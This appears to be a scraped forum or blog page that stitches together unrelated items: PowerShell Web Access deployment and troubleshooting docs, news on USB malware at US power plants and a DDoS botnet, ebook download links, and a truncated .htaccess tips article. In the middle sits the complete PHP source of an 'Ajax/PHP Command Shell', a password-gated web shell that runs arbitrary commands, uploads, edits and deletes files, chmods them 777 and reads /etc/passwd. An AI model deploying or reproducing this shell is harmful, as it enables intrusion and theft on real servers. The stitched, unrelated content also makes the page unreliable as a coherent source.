successful, and allowed by at least one authorization rule. 1. Authentication on the workgroup gateway server by adding a user name in the format server_name\user_name to the authorization rule 2. Authentication on the target computer by using alternate credentials provided on the sign-in page, in the Optional connection settings area Note [-] Using a single set of authorization rules for multiple sites Authorization rules are stored in an XML file. By default, the path name of the XML file is %windir%\Web\PowershellWebAccess\data\AuthorizationRules.xml. The path to the authorization rules XML file is stored in the powwa.config file, which is found in %windir%\Web\PowershellWebAccess\data. The administrator has the flexibility to change the reference to the default path in powwa.config to suit preferences or requirements. Allowing the administrator to change the location of the file lets multiple Windows PowerShell Web Access gateways use the same authorization rules, if such a configuration is desired. [-] Session management By default, Windows PowerShell Web Access limits a user to three sessions at one time. You can edit the web application’s web.config file in IIS Manager to support a different number of sessions per user. The path to the web.config file is $Env:Windir\Web\PowerShellWebAccess\wwwroot\Web.config. By default, Web Server (IIS) is configured to restart the application pool if any settings are edited. For example, the application pool is restarted if changes are made to the web.config file. Because Windows PowerShell Web Access uses in-memory session states, users signed in to Windows PowerShell Web Access sessions lose their sessions when the application pool is restarted. Windows PowerShell Web Access sessions time out. A time-out message is displayed to signed-in users after 15 minutes of session inactivity. If the user does not respond within five minutes after the time-out message is displayed, the session is ended, and the user is signed out. You can change time-out periods for sessions in the website settings in IIS Manager. [-] Using the web-based Windows PowerShell console After Windows PowerShell Web Access is installed and the gateway configuration is finished as described in this topic, the Windows PowerShell web-based console is ready to use. For more information about getting started in the web-based console, see Use the Web-based Windows PowerShell Console. [-] Troubleshooting access problems [table=width: 700, class: grid, align: center] [tr] [td]Problem[/td] [td]Possible cause and solution[/td] [/tr] [tr] [td]Sign-in failure[/td] [td]Failure could occur because of any of the following. An authorization rule that allows the user access to the computer, or a specific session configuration on the remote computer, does not exist. Windows PowerShell Web Access security is restrictive; users must be granted explicit access to remote computers by using authorization rules. For more information about creating authorization rules, see Step 3: Configuring authorization rules and site security in this topic. The user does not have authorized access to the destination computer. This is determined by access control lists (ACLs). For more information, see “Signing in to Windows PowerShell Web Access” in Use the Web-based Windows PowerShell Console, or the Windows PowerShell Team Blog. Windows PowerShell remote management might not be enabled on the destination computer. Verify that it is enabled on the computer to which the user is trying to connect. For more information, see “How to Configure Your Computer for Remoting” in about_Remote_Requirements in the Windows PowerShell About Help Topics. [/td] [/tr] [tr] [td]When users try to sign in to Windows PowerShell Web Access in an Internet Explorer window, they are shown an Internal Server Error page, or Internet Explorer stops responding. This issue is specific to Internet Explorer.[/td] [td]This can occur for users who have signed in with a domain name that contains Chinese characters, or if one or more Chinese characters are part of the gateway server name. To work around this issue, the user should install and run Internet Explorer 10, and then perform the following steps. 1. Change the Internet Explorer Document Mode setting to IE10 standards. Press F12 to open the Developer Tools console. In Internet Explorer 10, click Browser Mode, and then select Internet Explorer 10. Click Document Mode, and then click IE10 standards. Press F12 again to close the Developer Tools console. 2. Disable automatic proxy configuration. In Internet Explorer 10, click Tools, and then click Internet Options. In the Internet Options dialog box, on the Connections tab, click LAN settings. Clear the Automatically detect settings check box. Click OK, and then click OK again to close the Internet Options dialog box. [/td] [/tr] [tr] [td]Cannot connect to a remote workgroup computer[/td] [td]If the destination computer is a member of a workgroup, use the following syntax to provide your user name and sign in to the computer: <workgroup_name>\<user_name>[/td] [/tr] [tr] [td]Cannot find Web Server (IIS) management tools, even though the role was installed[/td] [td]If you installed Windows PowerShell Web Access by using the Install-WindowsFeature cmdlet, management tools are not installed unless the IncludeManagementTools parameter is added to the cmdlet. For an example, see To install Windows PowerShell Web Access by using Windows PowerShell cmdlets in this topic. You can add the IIS Manager console and other IIS management tools that you need by selecting the tools in an Add Roles and Features Wizard session that is targeted at the gateway server. The Add Roles and Features Wizard is opened from within Server Manager.[/td] [/tr] [tr] [td]The Windows PowerShell Web Access website is not accessible[/td] [td]If Enhanced Security Configuration is enabled in Internet Explorer (IE ESC), you can add the Windows PowerShell Web Access website to the list of trusted sites, or disable IE ESC. You can disable IE ESC on the local server properties page in Server Manager. The following error message is displayed while trying to connect when the gateway server is the destination computer, and is also in a workgroup: An authorization failure occurred. Verify that you are authorized to connect to the destination computer. When the gateway server is also the destination server, and it is in a workgroup, specify the user name, computer name, and user group name as shown in the following table. Do not use a dot (.) by itself to represent the computer name.[/td] [/tr] [tr] [td]The following error message is displayed while trying to connect when the gateway server is the destination computer, and is also in a workgroup: An authorization failure occurred. Verify that you are authorized to connect to the destination computer.[/td] [td][table=width: 500, align: center] [tr] [td]Scenario[/td] [td]UserName Parameter[/td] [td]UserGroup Parameter[/td] [td]ComputerName Parameter[/td] [td]ComputerGroup Parameter[/td] [/tr] [tr] [td]Gateway server is in a domain[/td] [td]Server_name\user_name, Localhost\user_name, or .\user_name[/td] [td]Server_name\user_group, Localhost\user_group, or .\user_group[/td] [td]Fully qualified name of gateway server, or Localhost[/td] [td]Server_name\computer_group, Localhost\computer_group, or .\computer_group[/td] [/tr] [tr] [td]Gateway server is in a workgroup[/td] [td]Server_name\user_name, Localhost\user_name, or .\user_name[/td] [td]Server_name\user_group, Localhost\user_group or .\user_group[/td] [td]Server name[/td] [td]Server_name\computer_group, Localhost\computer_group or .\computer_group[/td] [/tr] [tr] [td]Sign in to a gateway server as target computer by using credentials formatted as one of the following. Server_name\user_name Localhost\user_name .\user_name [/td] [/tr] [/table] [/td] [/tr] [tr] [td]A security identifier (SID) is displayed in an authorization rule instead of the syntax user_name/computer_name[/td] [td]Either the rule is no longer valid, or the Active Directory Domain Services query failed. An authorization rule is usually not valid in scenarios where the gateway server was at one time in a workgroup, but was later joined to a domain.[/td] [/tr] [tr] [td]Cannot sign in to a target computer that has been specified in authorization rules as an IPv6 address with a domain.[/td] [td]Authorization rules do not support an IPv6 address in form of a domain name. To specify a destination computer by using an IPv6 address, use the original IPv6 address (that contains colons) in the authorization rule. Both domain and numerical (with colons) IPv6 addresses are supported as the target computer name on the Windows PowerShell Web Access sign-in page, but not in authorization rules. For more information about IPv6 addresses, see How IPv6 Works.[/td] [/tr] [/table] [-] To uninstall Windows PowerShell Web Access by using the Remove Roles and Features Wizard 1. If Server Manager is already open, go on to the next step. If Server Manager is not already open, open it by doing one of the following. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Windows Start screen, click Server Manager. 2. On the Manage menu, click Remove Roles and Features. 3. On the Select destination server page, select the server or offline VHD from which you want to remove the feature. To select an offline VHD, first select the server on which to mount the VHD, and then select the VHD file. After you have selected the destination server, click Next. 4. Click Next again to skip to the Remove features page. 5. Clear the check box for Windows PowerShell Web Access, and then click Next. 6. On the Confirm removal selections page, click Remove. 7. After uninstallation is finished, go on to the procedure To delete the Windows PowerShell Web Access website and web applications by using IIS Manager. [-] To uninstall Windows PowerShell Web Access by using Windows PowerShell cmdlets 1. Do one of the following to open a Windows PowerShell session with elevated user rights. If a session is already open, go on to the next step. On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator. On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator. 2. Type the following, and then press Enter, where computer_name represents a remote server from which you want to remove Windows PowerShell Web Access. The –Restart parameter automatically restarts destination servers if required by the removal. Uninstall-WindowsFeature –Name WindowsPowerShellWebAccess -ComputerName <computer_name> -Restart To remove roles and features from an offline VHD, you must add both the -ComputerName parameter and the -VHD parameter. The -ComputerName parameter contains the name of the server on which to mount the VHD, and the -VHD parameter contains the path to the VHD file on the specified server. 3. Uninstall-WindowsFeature –Name WindowsPowerShellWebAccess –VHD <path> -ComputerName <computer_name> -Restart When removal is finished, verify that you removed Windows PowerShell Web Access by opening the All Servers page in Server Manager, selecting a server from which you removed the feature, and viewing the Roles and Features tile on the page for the selected server. You can also run the Get-WindowsFeature cmdlet targeted at the selected server (Get-WindowsFeature -ComputerName <computer_name>) to view a list of roles and features that are installed on the server. 4. After uninstallation is finished, go on to the procedure To delete the Windows PowerShell Web Access website and web applications by using IIS Manager. [-] To delete the Windows PowerShell Web Access website and web applications by using IIS Manager 1. Open the IIS Manager console by doing one of the following. If it is already open, go on to the next step. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager. On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results. 2. In the IIS Manager tree pane, select the website that is running the Windows PowerShell Web Access web application. 3. In the Actions pane, under Manage Website, click Stop. 4. In the tree pane, right-click the web application in the website that is running the Windows PowerShell Web Access web application, and then click Remove. 5. In the tree pane, select Application Pools, select the Windows PowerShell Web Access application pool folder, click Stop in the Actions pane, and then click Remove in the content pane. 6. Close IIS Manager. Note Source Deploy Windows PowerShell Web Access

nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format All Things Distributed - All Things Distributed High Scalability - High Scalability MySQL Performance Optimization & Support, InnoDB, XtraDB and XtraBackup Welcome to workaround.org | workaround.org HowtoForge - Linux Howtos and Tutorials Homepage

Two power plants in the US were affected by malware attacks in 2012, a security authority has said. US authorities did not specify which plants had been hit - and to what extent In its latest quarterly newsletter, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) said "common and sophisticated" attacks had taken place. Malware had infected each plant's system after being inadvertently brought in on a USB stick, it said. The ICS-CERT said it expected a rise in the number of similar attacks. Malware can typically used by cyber-attackers to gain remote access to systems, or to steal data. In the newsletter, authorities said: "The malware was discovered when an employee asked company IT staff to inspect his USB drive after experiencing intermittent issues with the drive's operation. "The employee routinely used this USB drive for backing up control systems configurations within the control environment." And at a separate facility, more malware was found. "A third-party technician used a USB-drive to upload software updates during a scheduled outage for equipment upgrades," the report said. "Unknown to the technician, the USB-drive was infected with crimeware. "The infection resulted in downtime for the impacted systems and delayed the plant restart by approximately three weeks." Physical effects The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened. "Such practices will mitigate many issues that could lead to extended system downtime," it said. "Defence-in-depth strategies are also essential in planning control system networks and in providing protections to reduce the risk of impacts from cyber-events." In recent years, power plants have been the target of increasingly destructive malware and viruses - a bridge between damage in a digital sense, such as data loss of theft, and actual physical infrastructure. In 2010, the Stuxnet virus was said to have damaged critical parts of Iran's nuclear infrastructure. Security firm Symantec research said it believed Stuxnet had been designed to hit motors controlling centrifuges and thus disrupt the creation of uranium fuel pellets. A UN weapons inspector later said he believed the attack had set back Iran's nuclear programme. No country has claimed responsibility for the attack, but a New York Times report last year, written by the author of a book on the attacks, pointed the finger at the US. Journalist David E Sanger wrote that the US had acted with the co-operation of Israel. Via BBC News - US plants hit by USB stick malware attack

~# shellhelp Ajax/PHP Command Shell © By Ironfist Version 0.7B The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you're not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains 'func name' => 'javascript function'. Take a look at the built-in functions for examples. I know this readme isn't providing too much information, but hell, does this shell even require one - Iron <?php session_start(); error_reporting(0); $password = "password"; //Change this to your password $version = "0.7B"; $functions = array('Clear Screen' => 'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' => "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = '<style type="text/css"> .cmdthing { border-top-width: 0px; font-weight: bold; border-left-width: 0px; font-size: 10px; border-left-color: #000000; background: #000000; border-bottom-width: 0px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #008000; font-family: verdana; border-right-width: 0px; border-right-color: #000000; } input,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #FFFFFF; background: #000000; border-bottom-width: 1px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #FFFFFF; font-family: verdana; border-right-width: 1px; border-right-color: #FFFFFF; } A:hover { text-decoration: none; } table,td,div { border-collapse: collapse; border: 1px solid #FFFFFF; } body { color: #FFFFFF; font-family: verdana; } </style>'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '<br>Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "<br><b>I can write to this directory</b>"; } else { print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>"; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '<b><font size=7>Ajax/PHP Command Shell</b></font> © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. <b>Custom Functions</b> If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. I know this readme isn\'t providing too much information, but hell, does this shell even require one - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">"; $contents = file($file[1]); foreach($contents as $line) { print htmlspecialchars($line); } print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.<br>"; if(function_exists(passthru)) { print "Passthru: <b><font color=green>Enabled</b></font><br>"; } else { print "Passthru: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(exec)) { print "Exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Exec: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(system)) { print "System: <b><font color=green>Enabled</b></font><br>"; } else { print "System: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(shell_exec)) { print "Shell_exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Shell_exec: <b><font color=red>Disabled</b></font><br>"; } print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>"; if( ini_get('safe_mode') ){ print "Safe Mode: <b><font color=red>Enabled</b></font>"; } else { print "Safe Mode: <b><font color=green>Disabled</b></font>"; } print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>"; if( ini_get('open_basedir') ){ print "Open_basedir: <b><font color=red>Enabled</b></font>"; } else { print "Open_basedir: <b><font color=green>Disabled</b></font>"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."<br>"; print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>"; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "<td>"; foreach($dirs as $directory) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>"; } print "</td><td>"; foreach($filez as $file) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>"; } print "</td></table>"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."<br>"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> <html> <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title> <head> <?php print $style; ?> <SCRIPT TYPE="text/javascript"> function sf(){document.cmdform.command.focus();} var outputcmd = ""; var cmdhistory = ""; function ClearScreen() { outputcmd = ""; document.getElementById('output').innerHTML = outputcmd; } function ClearHistory() { cmdhistory = ""; document.getElementById('history').innerHTML = cmdhistory; } function deletefile(file) { deleteit = window.confirm("Are you sure you want to delete\n"+file+"?"); if(deleteit) { runcommand('deletefile ' + file,'GET'); } } var http_request = false; function makePOSTRequest(url, parameters) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function SaveFile() { var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) + "&filecontent=" + encodeURI( document.getElementById("area1").value ); makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr); document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly."; } function runcommand(urltoopen,action,contenttosend){ cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory; document.getElementById('history').innerHTML = cmdhistory; if(urltoopen == "clear") { ClearScreen(); } var ajaxRequest; try{ ajaxRequest = new XMLHttpRequest(); } catch (e){ try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ alert("Wicked error, nothing we can do about it..."); return false; } } } ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>"; document.getElementById('output').innerHTML = outputcmd; var objDiv = document.getElementById("output"); objDiv.scrollTop = objDiv.scrollHeight; } } ajaxRequest.open(action, "?runcmd="+urltoopen , true); if(action == "GET") { ajaxRequest.send(null); } document.cmdform.command.value=''; return false; } function set_tab_html(newhtml) { document.getElementById('commandtab').innerHTML = newhtml; } function set_tab(newtab) { if(newtab == "cmd") { newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>'; } else if(newtab == "upload") { runcommand('upload','GET'); newhtml = '<font size=0><b>This will reload the page... </b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>'; } else if(newtab == "workingdir") { <?php $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\""; $pathparts = explode("/",realpath (".")); foreach($pathparts as $folder) { $folders .= $folder."/"; } $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>"; ?> newhtml = '<?php print $folders; ?>'; } else if(newtab == "filebrowser") { newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory'; runcommand('listdir .','GET'); } else if(newtab == "createfile") { newhtml = '<b>File Editor, under construction.</b>'; document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } document.getElementById('commandtab').innerHTML = newhtml; } </script> </head> <body bgcolor=black onload="sf();" vlink=white alink=white link=white> <table border=1 width=100% height=100%> <td width=15% valign=top> <form name="extras"><br> <center><b>Quick Commands</b><br> <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'> <?php foreach($functions as $name => $execute) { print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>'; } ?> </center> </div> </form> <center><b>Command history</b><br></center> <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div> <br> <center><b>About</b><br></center> <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'> <br> <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist <br> Version <?php print $version; ?> <br> <br> <br>Thanks to everyone @ <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a> <br> <a href="http://www.milw0rm.com" target=_blank>milw0rm</a> <br> and special greetings to everyone in rootshell </div> </td> <td width=70%> <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0> <b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> </font></td> <tr> <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div> <tr> <td height=1% width=100% valign=top> <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'> <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');"> <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br> </form> </div> </td> </table> </td> </table> </body> </html> <?php } } else { print "<center><table border=0 height=100%> <td valign=middle> <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\"> </form>"; } ?>

Snorby Cloud is an instantly deployable, usable, and hassle free Security Monitoring solution. Deploy your own Network & Host Security Monitoring solution in 5 minutes. Cloud Snorby TRIAL 24h

[python] CherryPy Essentials - Rapid Python Web Application Development (2007) Core Python Programming, 2nd Edition (2001) Dive Into Python (2004) Expert Python Programming (2008) Game Programming with Python, Lua, and Ruby (2003) Gray Hat Python - Python Programming for Hackers and Reverse Engineers Learning Python, 3rd Edition (2007) Making Use Of Python (2002) Mobile Python - Rapid Prototyping of Applications on the Mobile Platform (2007) Numerical Methods in Engineering with Python (2005) Download: http://www.mediafire.com/?1s4ya24bl48igr8 [perl] Advanced Perl Programming - O'Reilly Automating Windows with Perl - Miller Freeman Beginning Perl - Wrox 2000 Data Munging with Perl - Manning 2001 Extending and Embedding Perl - Manning 2003 Foy - Mastering Perl (O'Reilly, 2007) Graphics Programming with Perl - Manning 2002 Download: http://www.mediafire.com/?7757z7xaerny7tq

muta?i la ajutor XenoScanner

Incapsula security study reveals how a simple neglect in managing the administrative password of a small UK site was quickly exploited by Botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. If you've been following the news, you are probably aware of a wave of DDoS attacks that recently hit several major U.S. banks. Izz ad-Din al-Qassam, a hacker group that claimed responsibility for these attacks, declared them to be a retaliation for an anti-Islam video that mocked the Prophet Muhammad and a part of the on-going “Operation Ababil.” As the reports of the attack started to roll in, Incapsula security team was able to uncover one of the secret foot-soldiers behind the assault: a compromised general-interest UK-based website that was trying to hurl large chunks of junk traffic at three of the world's largest financial institutions (PNC, HSBC and Fifth Third Bank). At On the eve of the attack, this website suddenly became a focal point of a rapidly -increasing number of security events, caused by numerous requests with encoded PHP code payload. Incapsula was able to intercept these requests and traced them back to a backdoor shell that was used to hijack the site. The backdoor was installed before the website on-boarded Incapsula, and yet the cause of security breach was clear. The administrative password was...you guessed it: admin / admin. After decoding the incoming PHP requests, the security team could clearly identify them as DDoS attack commands, originating from a Turkish web design company website which was used as a remote Botnet C&C. From the looks of it, the Turkish website was also compromised and used as an additional buffer between the real hacker and its U.S. based targets. Further investigation showed that the UK website was a part of a Botnet for Hire which was working in “shifts” to produce HTTP and UDP flood attacks. As Incapsula team continued to block and monitor incoming DDoS commands, they saw that the list of targets went beyond American banks, also including e-commerce and commercial websites from several other countries. Incapsula published the full description of the DDoS attack in the company blog, concluding it by saying that this was just another demonstration of how security on the Internet is always determined by the weakest link. Simple neglect in manage the administrative password of a small UK site, can very quickly be exploited by Botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. Incapsula Security Analyst, Ronen Atias said: “This is a good example of how we are all just a part of a shared ecosystem where website security should be a shared goal and a shared responsibility.” Via: Under the hood of recent DDoS Attack on U.S. Banks - Hacking News

Reuze is a teeny-tiny front end framework that makes generating structure for blogs and article-heavy sites a breeze. It plays nice with other frameworks such as Foundation and Boostrap but also works equally well on it's own. Quickly create semantic HTML5 code blocks that conveniently sit in a 'namespaced' container and download the accompanying 10KB of CSS awesomeness from Github. It's responsive, IE8-friendly and topped up with RDFa Lite goodness! Reuze.me - A Generator of lightweight semantic HTML/CSS for content-driven sites

.htaccess is one file that every web admin should know and understand. At its basic level it controls access to your sites directories. But there is much more that you can do, as the snippets in this post will show you. If you you would like to learn the basics of .htaccess, you should check our our Introduction to .htaccess article, which explains pretty well everything you will need to get you up and running. So, here are some useful tricks you can do with .htaccess: 1. Controlling Access to Files and Directories Password protection is one thing, but sometimes you may need to completely block users from having the option of accessing a particular file or directory. This usually happens with system folders, such as the includes folder for which applications will need access but no users will ever need the privilege. To do this, paste this code onto an .htaccess file and and drop it in the directory: deny from all However, this will block access to everyone, including you. To grant yourself access you need to specify your IP address. Here is the code: order deny,allow deny from all allow from xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx is your IP. If you replace the last three digits with 0/12 for example, this will specify a range of IPs within the same network, thus saving you the trouble to list all allowed IPs separately. If you want to block access to a particular file, including .htaccess itself, use the following snippet instead: <Files .htaccess> order allow,deny deny from all </Files> Similarly, if you want to allow given IPs, list them with allow from. If you want to block access to particular file types, use this instead: <FilesMatch ".(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$"> Order Allow,Deny Deny from all </FilesMatch> 2. Disabling Directory Browsing To prevent directory browsing, add this: Options All -Indexes However, if for some reason you want to enable directory browsing, change it to the following: Options All +Indexes 3. Speeding-Up Load Times by Compressing Files You can compress any type of file, not only images. For instance, to compress HTML files, use this: AddOutputFilterByType DEFLATE text/html To compress TEXT files, use this: AddOutputFilterByType DEFLATE text/plain You can also compress JavaScript, or add compression to multiple file types with one command: AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/rss+xml Alternatively, if you want to compress all of your JavaScript, HTML, and CSS files with GZIP, you can use this: <IfModule mod_gzip.c> mod_gzip_on Yes mod_gzip_dechunk Yes mod_gzip_item_include file \.(html?|txt|css|js|php|pl)$ mod_gzip_item_include handler 